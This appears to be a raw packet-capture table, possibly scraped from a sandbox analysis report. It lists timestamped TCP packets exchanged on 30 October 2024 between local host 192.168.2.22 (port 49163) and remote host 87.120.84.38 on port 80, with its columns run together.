                                                                                                                                                                                  Oct 30, 2024 08:37:30.582227945 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582246065 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582360029 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582402945 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582417011 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582432985 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582454920 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582480907 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582480907 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582487106 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582503080 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582531929 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582551956 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582552910 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582570076 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582585096 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582600117 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582624912 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582624912 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.582664013 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583683014 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583698988 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583724976 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583740950 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583748102 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583756924 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583767891 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583772898 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583786964 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583790064 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583806992 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583811998 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583811998 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583823919 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583831072 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583842039 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583852053 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583858013 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583870888 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583883047 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583889008 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583898067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583908081 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583913088 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583928108 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583937883 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583944082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583956003 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583961964 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583973885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583981991 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.583990097 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584000111 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584007025 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584018946 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584036112 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584048033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584048033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584058046 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584073067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584074974 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584096909 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584096909 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584112883 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584112883 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584129095 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584132910 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584146023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584150076 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584161043 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584167004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584177017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584182978 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584192991 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584203005 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584209919 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584242105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584243059 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584264994 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584304094 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584336996 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584398985 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584481955 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584497929 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584513903 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584531069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584544897 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584547043 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584563017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584566116 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584577084 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584593058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584597111 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584598064 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584609032 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584625959 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584628105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584628105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584646940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584666014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584686995 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584745884 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584762096 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584785938 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584789038 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584801912 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584809065 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584826946 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584826946 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584841967 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584851980 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584867001 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584872961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584882975 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584888935 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584897041 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584908009 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584911108 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584928036 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584938049 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584945917 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584954023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584965944 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584969997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584986925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584990025 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584990025 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585000992 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585011005 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585024118 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585027933 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585040092 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585045099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585055113 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585071087 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585073948 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585089922 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585095882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585095882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585105896 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585118055 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585128069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585134983 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585151911 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585151911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585167885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585167885 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585184097 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585185051 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585196972 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585208893 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585212946 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585226059 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585230112 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585242987 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585246086 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585258961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585263968 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585275888 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585279942 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585293055 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585298061 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585309982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585314035 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585325956 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585340977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585355997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585361004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585361004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585372925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585380077 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585386038 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585401058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585402012 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585417032 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585428953 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585428953 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585431099 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585445881 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585448027 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585464001 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585464001 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585478067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585488081 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585494041 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585508108 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585520029 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585520029 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585532904 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585544109 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585550070 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585566044 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585570097 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585570097 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585582972 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585588932 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585608959 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585623980 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585654020 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586596966 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586612940 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586628914 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586644888 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586658001 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586663008 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586678028 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586692095 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586692095 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586695910 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586715937 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586730003 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586745977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586755037 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586760998 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586777925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586780071 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586780071 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586802006 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586805105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586805105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586817980 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586829901 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586833954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586848974 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586848974 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586865902 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586873055 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586874008 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586883068 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586905003 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586909056 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586909056 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586920977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586927891 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586942911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586946964 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586958885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586975098 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586983919 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586983919 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.586992025 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587007999 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587013960 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587013960 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587032080 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587032080 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587048054 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587054968 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587064028 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587074995 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587081909 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587093115 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587097883 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587111950 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587115049 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587131977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587137938 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587138891 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587148905 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587156057 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587165117 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587174892 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587182045 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587191105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587207079 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587222099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.587260962 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588084936 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588099957 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588114977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588136911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588141918 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588152885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588164091 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588169098 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588185072 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588193893 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588201046 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588210106 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588217974 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588227034 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588237047 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588243961 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588253021 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588259935 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588270903 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588284969 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588287115 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588300943 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588309050 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.588319063 CET804916387.120.84.38192.168.2.22
